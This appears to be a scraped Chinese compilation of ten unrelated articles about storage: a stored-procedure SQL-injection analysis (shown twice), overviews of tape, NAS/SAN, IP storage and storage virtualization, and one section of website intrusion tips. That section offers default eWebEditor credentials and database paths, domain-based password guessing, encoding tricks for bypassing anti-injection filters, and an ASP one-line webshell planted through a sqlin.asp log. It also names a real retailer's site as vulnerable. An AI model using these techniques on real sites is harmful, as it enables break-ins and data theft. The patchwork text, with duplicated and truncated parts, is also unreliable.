“超大MJ”通过精心收集,向本站投稿了10篇存储过程中用到的技术分析,以下是小编为大家整理后的存储过程中用到的技术分析,欢迎阅读与收藏。
篇1:存储过程中用到的技术分析
因为存储过程中存在用于字符串连接的 + 号连接SQL语句,这就造成SQL注入的可能性.
下面举例说明:
PR_UserManage_Users_BatchMove
CREATE PROCEDURE [dbo].[PR_UserManage_Users_BatchMove]
(
@UserType int = 1,
@GroupId NVarChar(500) =”,
@UserId NVarChar(4000) = ”,
@UserName NVarChar(255) = ”,
@StartUserId int = 0,
@EndUserId int = 0,
@BatchUserGroupId NVarChar(500) =”
)
AS
BEGIN
SET NOCOUNT OFF
If (@UserType = 1)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where UserID in (’ + @UserId + ‘)’)
END
Else If(@UserType = 2)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where UserName in (”’ + @UserName + ”’)')
END
Else If(@UserType = 3)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where UserId between ‘ + @StartUserId + ‘ and ‘ + @EndUserId)
END
Else If(@UserType = 4)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where GroupID in (’ + @BatchUserGroupId + ‘)’)
END
END
可以看出,在用户名的地方,没有过滤直接放入查询.
调用地方:
public bool MoveByUserName(string userName, int groupId)
{
Parameters parmsForUsers = new Parameters;
parmsForUsers.AddInParameter(“@UserType”, DbType.Int32, 2);
parmsForUsers.AddInParameter(“@UserName”, DbType.String, userName);
parmsForUsers.AddInParameter(“@GroupId”, DbType.Int32, groupId);
return DBHelper.ExecuteProc(“PR_UserManage_Users_BatchMove”, parmsForUsers);
}
指定用户名 这里加入SQL注入语句
“/”应用程序中的服务器错误,
存储过程中用到的技术分析
,
字符串 'jax')' 后的引号不完整。
'jax')' 附近有语法错误。
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.Data.SqlClient.SqlException: 字符串 'jax')' 后的引号不完整。
'jannock')' 附近有语法错误。
解决方案:
由于调用时不注意,可能造成危险,所以类似于这类的存储过程,应写在程序外面,便于过滤和发现,不要写在存储过程中。
篇2:存储过程中的注入技术
因为存储过程中存在用于字符串连接的 + 号连接SQL语句,这就造成SQL注入的可能性.
下面举例说明:
PR_UserManage_Users_BatchMove
CREATE PROCEDURE [dbo].[PR_UserManage_Users_BatchMove]
(
@UserType int = 1,
@GroupId NVarChar(500) =”,
@UserId NVarChar(4000) = ”,
@UserName NVarChar(255) = ”,
@StartUserId int = 0,
@EndUserId int = 0,
@BatchUserGroupId NVarChar(500) =”
)
AS
BEGIN
SET NOCOUNT OFF
If (@UserType = 1)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where UserID in (’ + @UserId + ‘)’)
END
Else If(@UserType = 2)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where UserName in (”’ + @UserName + ”’)')
END
Else If(@UserType = 3)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where UserId between ‘ + @StartUserId + ‘ and ‘ + @EndUserId)
END
Else If(@UserType = 4)
BEGIN
EXEC(’Update PE_Users set GroupID= ‘ + @GroupId +’ Where GroupID in (’ + @BatchUserGroupId + ‘)’)
END
END
篇3:存储技术
DLT(DigitalLinearTape,数字线性磁带)源于1/2英寸磁带机,它出现很早,主要用于数据的实时采集,DLT每盒容量高达40GB以上,成本较低,主要定位于中、高级的服务器市场与磁带库系统。LTO(LinearTapeOpen,线性磁带开放协议)是一种结合了线性多通道双向磁带格式的磁带存储技术,其优点主要是将服务系统、硬件数据压缩、优化磁道面、高效纠错技术和提高磁带容量性能等结合于一体,
LTO是一种开放格式技术,用户可拥有多项产品和多规格存储介质,还可提高产品的兼容性和延续性。DAT(DigitalAudioTape)使用影像磁带式技术D旋转磁头和按对角方式穿越4mm磁带宽度的螺旋式扫描磁道来达到快速访问数据的目的,即使是很小的磁带盒也可达到很高的容量。这种技术后来也使用8mm磁带盒。使用特殊的磁带涂层可将容量扩大为20GB或40GB。AIT(先进的智能型磁带)是SONY公司在快速访问高密度磁带录制技术方面的最新创新,现已成为磁带机工业标准。AIT使用一种磁带盒上含有记忆体晶片的磁带,通过在微型晶片上记录磁带上文件的位置,大大减少了存取时间。
篇4:网络存储安全技术分析
随着数字信息的爆炸式增长和个人与组织对这些信息的依赖性不断增加,存储系统正逐渐成为整个信 息系统的中心,数据成为最重要的资产,然而,存储系统由本地直连向着网络化和分布式的方向发展,使存储系统变得更易受到攻击。窃取、篡改或破坏重要数据的事件不断发生。因此安全问题是日前存储网研究中急需要解决的重要问题。
一、存储安全的服务
存储系统提供的存储安全服务主要包括认证和授权、可用性、机密性和完整性、密钥共享和密钥管理 施、审计和人侵检测以及可使用性、可管理性和性能等方面。
二、当前存储一系统安全研究
网络存储是网络时代最佳的存储解决方案。NAS(Network AttachedStorage)和SAN(Storage Area Network)是常用的2种网络存储技术,不同于直接连接存储DAS(Direct Attached Storage)的是网络存储 直接与网络连接,为整个网络提供集中、共享的存储服务。
网络连接存储,简称NAS是一种可以提供文件级服务的存储设备。其特点是可以直接挂到网络上向用 户提供文件级服务。此外。它有自己简化的实时操作系统,并将硬件和软件有效地集合在一起,用以提 供文件服务NAS存储系统的特点是通过基于IP网络的网络文件协议向多种客户端提供文件级I/O服务,客户端可以在NAS存储设备提供的目录或设备中进行文件级操作当用户或应用程序试图访问文件时,经过解 释的I/O请求被重定向到网络传输路径这螳经过解释的I/O请求经过IP网络传输到NAS服务器端,由NAS服务器端的网络文件协议接收,之后,进行解包,同时处理客户端和块设备的映射关系,最后,将正常的 I/O操作请求交给服务器上的文件系统处理。
SAN是一种以数据存储为中心且面向网络的存储结构。SAN技术采用可扩展的网络拓扑结构连接存储设 备和服务器,是一种面向服务器提供数据存储服务,并将数据的存储和管理集中在相对独立的专用网络中的存储技术.在SAN技术中,由于服务器和存储设备之间的多路可选择的数据交换,因此,以往存储结 构中存在的可扩展性和数据共享方面的局限性被消除了,SAN中通过协议映射,存储设备的磁盘或磁带表 现为服务器节点上的“网络磁盘”在服务器操作系统看来,网络盘与本地盘相同,服务器节点操作网络盘就像操作本地硬盘一样对其发送命令,命令通过相关协议的封装后,由服务器发送到SAN网络,并由存储设备接收并执行服务器节点可以对“网络磁盘”进行各种块操作和文件操作,
三、网络存储系统安全技术分析所需解决的问题
(一)SAN安全机制
SAN交换机、HBA(Host—Bus Adapters)和存储阵列等SAN设备层的配置都与其安全特性有关。 SAN的安全机制包括交换机端口类型配置、分区和LUN(Logical Unit Number)屏蔽。WWN(World Wide Name)是光纤通道中用于标识节点和端口的64位惟一注册标识符。分区的作用类似于VLAN,基于WWN的软 分区由于存在WWN的盗用,因此安全性较低。硬件分区根据交换机端口WWN的组合划分,分区的访问限制 不能突破,因而具有更高的安全性。应是首选的分区方法。逻辑单元号LUN是一种对存储设备的划分。LUN屏蔽是一种比分区粒度更细的访问控制方法,它可以控制服务器对不同逻辑单元的访问。
(二)NAS文件系统安全机制
NAS使用CIFS和NFS来实现网络文件共享,其安全机制建立在CIFS和NFS的基础上。CIFS提供认证和授 权这2种安全机制,其中认证又包括共享级认证和用户级认证。在共享级认证方式下,整个共享点只有一 个单一的口令用于共享访问,提供的安全保障有限,只能用于对安全性要求不高的公共资源共享或临时资源共享等场合。用户级认证方式为不同用户提供不同的用户名,因此能提供高于共享级认证的安全性,但用户名和口令是以明文方式传送,因此也存在被监听的威胁。
四、总结
作为全新的网络存储技术,NAS和SAN尚处于成长期,其国际标准尚未形成因此,对于网络存储安全体系结构的研究,只能是根据目前的体系结构进行一些探讨,给出一个相对安全的对策方案,以保证能获 得最高水平的数据与系统安全随着与的结合与广泛应用,关于加强网络存储的安全性研究有待进一步的改进和扩展。
篇5:网络存储技术初探
1 IP技术介绍
IP存储涉及到了一系列的技术,它可以使块级存储的数据存基于IP的网路中传输,这里面有两个技术需要阐明:IP技术的利用和块级存储,网络中块级存储的数据传输不是新技术,今天的存储区域网络SAN即便采用是光纤通道FC技术业仍旧如此。然而,新的IP存储协议则可将多个SAN通过IP如以太网的结构建立起来,并且完全互联。通用互联网文件系统CIFS和网络文件系统NFS是将文件级的请求发送到拥有这些文件系统的服务器上,这些请求得到那些文件服务器或网络存储NAS设备的响应,并发送到网络上的主机。
2 IP存储适应不断增长的网络需求
今天,IP已经成为稳固的且重要的通用网络协议,lP存储自然成为最能适应日益增长的网络存储需求的技术。
2.1日益增长的网络存储
国际数据协会IDC预计在以后,存储容量将每年增长85%,这一增长表明:重要数据在不断增长,而对存储资源的管理越来越难。因此,各个公司都在致力于开发基于SAN的网络存储系统,用于存储、访问、保护和管理关键业务的数据。实事上,IDC预测到,全球92%的存储将实现网络 化。
2.2 IP是早已应用在网络的协议与其他网络协议相比,在全球范伟内关键业务应用中,IP得到了更为广泛的认可,在以太网环境中,lP技术也是较为经济实用的。得益于IP技术的广泛应用以及其低廉的价格,很多信息专家都致力于IP技术的应用,使得IP技术的开发拥有更广更扎实的基础。IP的 这种质量服务体系、链接优先技术和安全机制推动了其技术的快速发展和开发的不断扩大。
2.3 IP存储是IP技术的下一个阶段在早期的IP技术开发中,多是IP构架在所有事情上,像Ethernet、Token Ring、ATM等,而今天的视频、声音,以及块级存储技术则都是基于IP进行传输的,形成了一切构架在IP 上的态势。
3 IP存储的标准过程
目前IETF开发的三种IP存储压缩协议:iSCSl、基于 TCP/IP的光纤通道FCIP和互联网光纤通道协议iFCP。
3.1 iSCSI通过lP方式传输SCSI指令 将来 iSCSI可提供必要的映射,通过IP传输SCSI指令就像今天的光纤通道可以传输SCSI指令一样。iSCSI是为 主机到存储设备的端到端连接而设计的,类似于光纤通道的SAN构架,iSCSI技术包括可使主机到兼容的 存储设备之间通过IP交换机进行通讯,
而驱动器仍可以使用真正的SCSI驱动器,因为iSCSI并不等同于今天的硬盘连接技术。
3.2 FCIP光纤通道SAN环境的互联就像iSCSI协议将SCSI指令压缩为IP包一 样,FCIP协议将光纤通道指令压缩为IP包,FCIP协议允许独立的SAN环境通过IP网络互联在一起。每个 SAN采用标准FC寻址,在FCIP的端点之间建立IP隧道或网关,一旦隧道建立,扩展的FC设备将被视为标准 的FC设备,并予以FC寻址。典型的应用是在一个FCIP端点上连接两个或更多架构在标准IP网络之上的FC 交换机,通过内部交换链路与先前的SAN光纤环路相结合。
3.3 IFCP具有不同的寻址模式在最新 的IP存储协议中,iFCP介于前面介绍的两种协议之间,如同FCIP一样,iFCP将FC帧压缩,采用通用FC压 缩格式,通过IP架构进行传输,与前两种协议的主要区别在寻址模式。FCIP协议是在两个SAN之间通过以 太网建立点到点的隧道,构成一个统一的SAN环境。与之相对应的是iFCP在FC和IP之间建立网关到网关的 连接是FC帧可以路由到正确的目的地址。与FCIP协议寻址方式不同的是目前的iFCP寻址模式是它可以允 许每一个互联的SAN都拥有独立的命名空间。
4 IP存储的寻址
IP存储是一个新兴的技术, 尽管其标准早已建立且应用,但将其真正广泛应用到存储环境中还需要解决几个关键技术点。
4 .1 TCP负载空闲由于lP无法确保提交到对方,而将TCP作为底层传输的三种IP存储协议则需要再拥挤的、远距离的IP空间中确保传输的可靠性,由于IP包可以打乱次序传送,因此,TCP层需要重新修正次序,以提交到上一层的协议中,如SCSI。TCP完成这一任务的典型操作是使用重调顺序缓冲器,将数据包的顺序完全整理为正确方式,完成这一操作后,TCP层将数据发送到下一层。
4.2价格性能比尽管IP 技术很有可能得以应用,但如果对性能较为看重的话,不推荐使用标准的以太网卡。如前所述,TOE可以 减少服务器的处理负载,但由于TOE设备较新,其硬件成本及复杂程序都比标准网卡更高。其广泛应用可 能会由于价格性能比过高而受阻。像那些增强的iHBA都需要进一步改进,已达到FC技术的水平。
4.3安全性当存储设备通过IP架构进行远距离连接时,安全性变得愈加重要。生产厂家必须明确 产品的安全级别,并确保其安全性。在IP存储产品广泛应用之前,这一问题时IETF需要解决的。
4.4互联性基于IP的技术并没有被所有厂家共同使用,虽然这个协议的标准早已被公布,但并不 能保证厂家和厂家使用相同的协议或技术。为了保证这些产品能够互相配合得更好,必须保证厂家之间采用相同的协议,使各厂家产品具有良好的互联性。
5 IP存储的应用现状
篇6:入侵过程中用到的小技巧
1. 判断服务器所使用的系统
例如我们的目标网址为“www.00day.cn/forum/index.php”那么我们把地址改为www.00day.cn/forum/index.PHP后再浏览看看是否存在页面,如果存在的话,则服务器所使用的系统为windows,如果显示不存在,则服务器很有可能使用的是*nix系统,
2. Ewebeditor拿站的新技巧
Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
3. 社工的小技巧
在入侵的时候如果目标网站有论坛的话,我们可以试一下社工,例如一个网站是“www.00day.cn”, 管理员名称为admin,那么我们就可以试试用密码“00day”和“00day.cn”来登陆,这种方法最适合在入侵大型公司网站的时候使用!
4. 入侵时的思维拓展
有时候我们获得了目标网站的管理员密码,但是又找不到后台,这是可以试下用FTP登陆,例如,目标网站是”www.00day.cn “ 得到的密码为“bishi”,我们就可以试下用“00day”“00day.cn”www.00day.cn作为FTP 用户名,用“bishi”:作为FTP密码来进行登陆,成功的几率可以很大的哦!
5. 入侵时获得管理员名称
有时候在入侵类似于新闻发布网的网站时,注入得到了管理员密码,但是拿不到管理员的名称,网站上也没有论坛什么的,这时候该怎么办呢?我们可以随便打开一个新闻,然手仔细找找诸如“提交者”“发布者”之类的字眼,一般“提交者”就是管理员的名称了。
6. 寻找管理员后台
有时候我们得到了管理员的账号和密码,但是却苦于找不到后台。这时候我们可以对着网站上的图片点右键,查看其属性,
有时的确能找到后台的!
7 . 暴web绝对路径
众所周知,在入侵asp.net的网站时,我们首先就是在aspx文件前加上一个“~”来尝试暴出web的绝对路径,但在入侵用ASP+IIS架设的网站时能不能用呢?答案是肯定的,但是有一定的技巧,假设目标网站的主页为 www.00dat.cn/index.asp, 我们可以尝试提交这样的网址www.00day.cn/fkbhvv.aspx ,其中fkbhvv.aspx 是不存在的!这个方法的成功率大约是%60. 家乐福的官方站就有这个漏洞。。
8. stm文件在入侵中的作用
当网站不允许上传asp .. cer ..cdx . htr 等文件时,上传一个stm文件,代码为 “”(想查看什么文件就写什么文件名,这里我假设想查看的文件名为”conn.asp”),,然后直接打开这个stm文件的地址,再查看源代码,“conn.asp”这个文件的代码就一览无遗了!
9. 注入的技巧
在找到一个网站可能存在注射漏洞的地址时(假设地址为www.00day.cn/news.asp?id=6),我们通常会先提交一个单引号“’”来测试是否存在注射漏洞,但目前网上的通用防注入程序还是很多,所以很有可能会返回“XX通用防注入程序已阻止你试图进行的攻击!”的注入此类消息框。这时我们除了可以尝试COOKIES注入之外,还可以把变量编码一下(如”www.00day.cn/news.asp?id=6”编程” www.00day.cn/news.asp%69%64=6”)来进行注射,不行的话可以转换一下大小写(如“id”变成“ID”),或者转换大小写后再编码来进行注射等,总之想一些办法来把变量弄怪点,很多通用防注入程序都存在这写被绕过的缺陷!
10. 防注入程序拿shell
当你用单引号“’”来测试一个网站可能存在注入漏洞的地址时(假设网址为“www.00day.cn/news.asp?id=6”)弹出了“你的操作已被记录!”这类信息,而我们又没办法去绕过防注入系统的时候,可以试着提交www.00day.cn/sqlin.asp看看存不存在“sqlin.asp” ,如果存在的话,我们只要提交” www.00day.cn/news.asp?id=6’<%execute request(“j”)%>“ ,然后再用一句话木马客户端来连接www.00day.cn/sqlin.asp文件就行了,因为目前很多通用防注入程序都是用”sqlin.asp“这个文件名来做非法记录的数据库,而且大多数都没防下载处理。
篇7:绿色存储技术及应用
绿色存储技术及应用
绿色技术已经成为非常热的一个话题,不管IT行业,还是其他行业,所有的`人都会在乎绿色概念或者是绿色技术.在全球金融危机的影响下,绿色技术不但没有受到影响,反而更加受到人们的重视.企业管理层更加关心绿色技术的基本原因是由于绿色技术可以帮助企业有效降低运营成本,同时还可以减少排放的废物量,为环保做出贡献.而绿色存储是现有绿色技术中研究和应用比较多的一个分支,通过实施绿色存储可以让管理者和使用者亲身体验绿色技术的魅力.
作 者:何奕 作者单位:广州快速交通建设有限公司 刊 名:中国交通信息产业 英文刊名:CHINA ITS JOURNAL 年,卷(期): “”(1) 分类号:U4 关键词:篇8:存储虚拟化技术
计算机存储技术经历了从单个的磁盘、磁带、RAID到存储网络系统的发展历程,这一路走来似乎缓慢而艰辛,随着存储数据的不断增长,对存储空间的迫切需求推动着存储虚拟化技术不断向前。
1、什么是存储虚拟化
存储虚拟化:可以理解为把硬件资源抽象化,用虚拟形式来展示它们。
虚拟化能够把物理的存储系统从数据驱动的具体工作中解放出来,从而使用户能够随意地按实际需要对有限的存储资源进行分配。
虚拟化可以将多个物理存储资源池合成一个虚拟的存储资源,再对其实施集中管理或者以逻辑方式将其分成多个虚拟机。
存储虚拟化技术是通过把物理层资源抽象化,从而将一个灵活的、逻辑的数据存储空间展现在用户面前。
最基础的存储虚拟化实现是在主机层,通过计算机操作系统的逻辑卷管理器能够很便捷的为应用系统和用户分配存储容量。
2、存储虚拟化的主要特点
(1)虚拟存储为大容量存储系统集中管理提供了一个手段,由网络中的一个环节(如服务器)进行统一管理,从而避免了由于扩充存储设备为管理带来的麻烦。
(2)对于视频网络系统虚拟存储最值得一提的特点是:大幅度提高存储系统整体访问的带宽。
多个存储模块组成了当前的存储系统,而虚拟存储系统能够很好地实现负载平衡,把每次数据访问所需占用的带宽十分合理地分配到各个存储模块上,这样整个视频网络系统的访问带宽就变大了。
(3)虚拟存储技术使得存储资源管理变得更加灵活,能够把不同类型的存储设备集中管理统一分配使用,有效保障了用户以往对存储设备的投资。
(4)虚拟存储技术能够通过相关管理软件,为网络系统提供许多其它的功能,现在比较流行的如无需服务器的远程镜像、数据快照等技术。
3、相关存储技术
现在虚拟存储的发展还没有一个统一的标准,从它的拓扑结构来看主要有两种方式:即对称式与非对称式。
对称式虚拟存储技术是指虚拟存储控制设备与存储软件系统,交换设备集成为一个整体,内嵌在网络数据传输路径中;非对称式虚拟存储技术是指虚拟存储控制设备独立于数据传输路径之外。
而从它的实现原理来看也有两种方式:即数据块虚拟与虚拟文件系统。
3.1 对称式虚拟存储具有以下主要特点
3.1.1 大容量高速缓存的应用,使数据传输速度明显提高
缓存是位于主机与存储设备之间的I/O路径上的中间介质被存储系统广泛采用的。
当主机向存储设备读取数据时,会先把与当前数据存储位置相关联的数据读到缓存中,并将多次调用过的数据保留在缓存中;当主机读/写数据时,缓存这个中间介质就能够大大提高读/写速度。
3.1.2 多端口并行技术,使I/O瓶颈消于无形
传统的存储设备中控制端口与逻辑盘之间关系就是一一对应,访问一块硬盘只能通过一个特定的控制器端口。
但在对称式虚拟存储设备中,SAN Appliance的存储端口与LUN的关系是虚拟的,即多台主机可以通过多个存储端口(最多8个)同时并发访问同一个LUN;在光纤通道100MB/带宽的大前提条件下,并行工作的端口数量越多,数据带宽就越高。
3.1.3 逻辑存储单元为用户提供了高速的磁盘访问速度
在视频应用环境中,应用程序读写数据是以固定大小(512byte~1MB)的数据块为单位的。
但存储系统为了能保证应用程序的带宽需求,常常设计为传输512byte大小以上的数据块时才能达到其最佳I/O性能。
对称式虚拟存储系统为主机提供了真正的超大容量、高性能的LUN,使数据传输速度得到有效提高,解除了主机CPU的大工作量,有效提高了主机性能。
3.1.4 成对的HSTD系统的容错性能
HSTD是在对称式虚拟存储系统中数据进出的必经之地,存储池则是数据存放地。
由于存储池中的数据都有容错机制保障数据安全,因此用户当然关心HSTD是否有容错保护。
和许多大型存储系统一样,HSTD在成熟的对称式虚拟存储系统中是成对配制的,每对HSTD之间是通过SAN Appliance内嵌的网络管理服务保证缓存数据一致和提供相互通信的。
3.1.5 在SAN Appliance之上能够方便的连接交换设备,最终实现超大规模Fabric结构的SAN
因为系统延续了标准的SAN结构,为系统之后的扩展和互连提供了技术保障,所以在SAN Appliance之上能够方便的连接交换设备,最终实现超大规模Fabric结构的SAN。
3.2 非对称式虚拟存储系统具有如下特点
(1)将不同物理硬盘阵列中的容量进行逻辑组合,实现虚拟的带区集,将多个阵列控制器端口进行绑定,一定程度上将系统的可用带宽提高了。
(2)在交换机端口数量充足的情况下,可在一个网络内安装两台虚拟存储设备用以实现Strip信息和访问权限的冗余。
3.3 数据块虚拟与虚拟文件系统
数据块虚拟存储方案可用于解决数据传输过程中的冲突和延时问题。
在多交换机组成的大型Fabric结构的SAN中,由于多台主机通过多个交换机端口读/写存储设备,数据块冲突和延时问题非常突出。
数据块虚拟存储方案采用虚拟的多端口并行技术,为多台客户机提供了很高的带宽,尽可能减少了延时与冲突的发生。
对称式拓扑结构是数据块虚拟存储方案在实际应用中的表现形式。
虚拟文件系统存储方案适用于解决大规模网络系统中文件共享的安全机制问题。
通过对不同的站点赋予不同的访问权限,保证网络文件的安全。
非对称式拓扑结构是虚拟文件系统存储方案在实际应用中的表现形式。
4、存储虚拟化的作用
存储虚拟化是对存储设备等硬件资源进行抽象化,这种虚拟化使用户能够与存储资源中大量的物理特性分离开来。
从用户角度看,虚拟化的存储资源就如同一个巨大的“存储池”,用户不会看到诸如磁盘、磁带等的存储部件,也不用关心数据将经过哪一条路径又通往哪一个具体的存储设备。
篇9:存储虚拟化技术
摘要:近年来,随着网络在人们生活中的普遍应用,由此产生的数据也在以爆炸似的速度增长,而各企业单位管理数据能力的提高速度总是远远不及数据增长的速度,因此,存储系统的改革成为必然。
主要从存储系统的虚拟化方面阐述了存储系统的改革,并详细分析了虚拟化技术在存储系统中的应用。
关键词:虚拟化;存储系统;存储虚拟化
0引言
进入21世纪以来,网络在现在企业的运行环境中应用得越来越普遍,各种数据也在快速增长,虽然现在企业管理数据的能力也在提高,但是已经远远跟不上数据增长的速度。
虚拟化技术的出现为企业解决这一难题提供了新的途径。
运用虚拟化技术,像备份/恢复、数据归档、存储资源分配等大量重复和消耗时间的工作,完全能够通过存储虚拟化技术运用自动化的方法进行处理,从而使人的工作量大大降低,提供企业的效率。
存储虚拟化为用户提供的益处也是显而易见的,首先是使存储管理的复杂性降低,减少了存储管理和运行的成本;其次是提高了存储效率,使存储投资的费用大大降低。
篇10:网络存储技术论文
网络存储技术论文
[摘要]网络数据信息爆炸性的增长,使网络存储技术变得越来越重要,已成为Internet及其相关行业进一步发展的关键。本文详细介绍了常见的三种网络存储技术的优缺点及应用范围,并介绍了几种新的网络存储技术,使读者对网络存储技术有一个全面的了解。
[关键词]网络存储直接连接存储网络附加存储存储区域网络
一、引言
信息是一个企业可持续发展的核心动力之一,信息的可靠存储是一个企业得以正常运作和发展壮大的根本所在。随着越来越多的关键信息转化为数字形式并存储在可管理的介质中,用户对存储和管理信息的能力产生了新的需求。为更有效地使用和管理信息,用户对信息系统的搭建、数据中心的建设、数据的管理模式、数据的有效使用、信息存储介质的选择以及信息的安全存储等方面,提出多样化的要求,以达到数据的最佳利用。
网络存储设备提供网络信息系统的信息存取和共享服务,其主要特征体现在:超大存储容量、大数据传输率以及高可用性。要实现存储设备的性能特征,采用RAID作为存储实体是必然选择。传统的网络存储设备都是将RAID硬盘阵列直接连接到网络系统的服务器上,这种形式的网络存储结构称为(DASDirectAttachedStorage),目前,按照信息存储系统的构成,SAN(StorageAreaNet-work)和NAS(NetworkAttachedStorage)是最常见的两种选择。本文将详细介绍这三种存储技术的优缺点和应用范围,并将介绍几种新的网络存储技术。
二、传统网络存储技术
1.DAS存储
直接连接存储(DAS——DirectAttachedStorage)是指将存储设备通过SCSI接口或光纤通道直接连接到服务器上的方式。这种连接方式主要应用于单机或两台主机的集群环境中,主要优点是存储容量扩展的实施简单,投入成本少、见效快。
DAS适用于以下几种情况:(1)服务器在地理分布上很分散,通过SAN或NAS在它们之间进行互连非常困难时;(2)存储系统必须被直接连接到应用服务器,如某些数据库使用的“原始分区”上时;(3)包括许多数据库应用和应用服务器在内的应用,它们需要直接连接到存储器上。
当服务器在地理上比较分散很难通过远程连接进行互连时,或传输速率并不很高的网络系统,直接连接存储是比较好的解决方案,甚至可能是唯一的解决方案,但是由于DAS存储没有网络结构,存在许多缺点:一方面该技术不具备共享性,每种客户机类型都需要一个服务器,从而增加了存储管理和维护的难度;另一方面,当存储容量增加时,扩容变得十分困难,而且当服务器发生故障时,数据也难以获取。因此,难以满足现今的存储要求。
2.NAS存储
网络附加存储(NAS——NetworkAttachedStorage)即将存储设备通过标准的网络拓扑结构例如(以太网),连接到一群计算机上,提供数据和文件服务。NAS服务器一般由存储硬件、操作系统以及其上的文件系统等几个部分组成。简单的说,NAS是通过与网络直接连接的磁盘阵列,它具备了磁盘阵列的所有主要特征:高容量、高效能、高可靠。
NAS由于其较好的可扩展性、可访问性、低价位、安装简单、易于管理等优点,广泛应用于电子出版、CAD、图像、教育、银行、政府、法律环境等那些对数据量有较大需求的应用中。多媒体、Internet下载以及在线数据的增长,特别是那些要求存储器能随着公司文件大小规模而增长的企业、小型公司、大型组织的部门网络,更需要这样一个简单的可扩展的方案。
但在实际应用中,NAS也存在着以下不足:(1)在文件访问的速度方面。NAS采用的是FileI/O方式,这带来巨大的网络协议开销。正是因为这个原因,NAS不适合在对访问速度要求高的应用场合,如数据库应用、在线事务处理。(2)在数据备份方面。需要占用LAN的带宽,浪费宝贵的网络资源,严重时甚至影响客户应用的顺利进行。(3)在资源的整合和NAS的管理方面。NAS只能对单个存储(单个NAS内部)设备之中的磁盘进行资源的整合,目前还无法跨越不同的NAS设备,难以将多个NAS设备整合成一个统一的存储池,因而难以对多个NAS设备进行统一的集中管理,只能进行单独管理。
3.SAN存储
存储区域网络(SAN--StorageAreaNetwork)是指存储设备相互连接且与一台服务器或一个服务器群相连的网络。其中的服务器用SAN的接入点。SAN是一种特殊的高速网络,连接网络服务器和诸如大磁盘阵列或备份磁带库的`存储设备,SAN置于LAN之下,而不涉及LAN。利用SAN,不仅可以提供大容量的存储数据,而且地域上可以分散,并缓解了大量数据传输对于局域网的影响。SAN的结构允许任何服务器连接到任何存储阵列,不管数据置放在哪里,服务器都可直接存取所需的数据。
SAN的应用主要可以归纳为下面集中应用:构造群集环境,利用存储局域网可以很方便地通过光纤通道把各种服务器、存储设备连接在一起构成一个具有高性能、较好的数据可用性、可扩展的群集环境。(1)数据保护,存储局域网可以做到无服务器的数据备份,数据也可以后台的方式在存储局域网上传递,大大减少了主要网络和服务器上的负载,所以存储局域网可以很方便地实现诸如磁盘冗余、关键数据备份、远程群集、远程镜像等许多防止数据丢失的数据保护技术;(2)数据迁移,可以方便地进行两个存储设备之间的数据移动;(3)灾难恢复,特别是远程的灾难恢复;(4)数据仓库,用来构建一个网络系统的存储仓库,使得整个存储系统可以很好地共享。
在实际应用中,SAN也存在着一些不足:(1)设备的互操作性较差。目前采用最早和最多的SAN互连技术还是FibreChannel,对于不同的制造商,光纤通道协议的具体实现是不同的,这在客观上造成不同厂商的产品之间难以互相操作。(2)构建和维护SAN需要有丰富经验的、并接受过专门训练的专业人员,这大大增加了构建和维护费用。(3)在异构环境下的文件共享方面,SAN中存储资源的共享一般指的是不同平台下的存储空间的共享,而非数据文件的共享。(4)连接距离限制在10km左右等。更为重要的是,目前的存储区域网采用的光纤通道的网络互连设备都非常昂贵。这些都阻碍了SAN技术的普及应用和推广。
三、新的网络存储技术
1.NAS网关技术
NAS网关与NAS专用设备不同,它不是直接与安装在专用设备中的存储相连接,而是经由外置的交换设备,连接到存储阵列上——无论是交换设备还是磁盘阵列,通常都是采用光纤通道接口——正因为如此,NAS网关可以访问SAN上连接的多个存储阵列中的存储资源。它使得IP连接的客户机可以以文件的方式访问SAN上的块级存储,并通过标准的文件共享协议(如NFS和CIFS)处理来自客户机的请求。当网关收到客户机请求后,便将该请求转换为向存储阵列发出的块数据请求。存储阵列处理这个请求,并将处理结果发回给网关。然后网关将这个块信息转换为文件数据,再将它发给客户机。对于终端用户而言,整个过程是无缝和透明的。NAS网关技术使得管理人员能够将分散的NASfilers整合在一起,增强了系统的灵活性与可伸缩性,为企业升级文件系统、管理后端的存储阵列提供了方便。
2.IP-SAN技术
网络存储的发展产生了一种新技术IP-SAN。IP-SAN是以IP为基础的SAN存储方案,是一种可共同使用SAN与NAS,并遵循各项标准的纯软件解决方案。IP-SAN可让用户同时使用GigabitEthernetSCSI与FibreChannel,建立以IP为基础的网络存储基本架构,由于IP在局域网和广域网上的应用以及良好的技术支持,在IP网络中也可实现远距离的块级存储,以IP协议替代光纤通道协议,IP协议用于网络中实现用户和服务器连接,随着用于执行IP协议的计算机的速度的提高及G比特的以太网的出现,基于IP协议的存储网络实现方案成为SAN的更佳选择。IP-SAN不仅成本低,而且可以解决FC的传播距离有限、互操作性较差等问题。
四、结束语
数据的重要性越来越得到人们的广泛认同。未来网络的核心将是数据,网络化存储正是数据存储的一个发展方向。这里我们简要的介绍了几种当前比较流行的网络存储技术,当前网络存储技术还在不断的快速发展,SAN和NAS的融合、统一虚拟存储技术是未来发展的两个趋势。
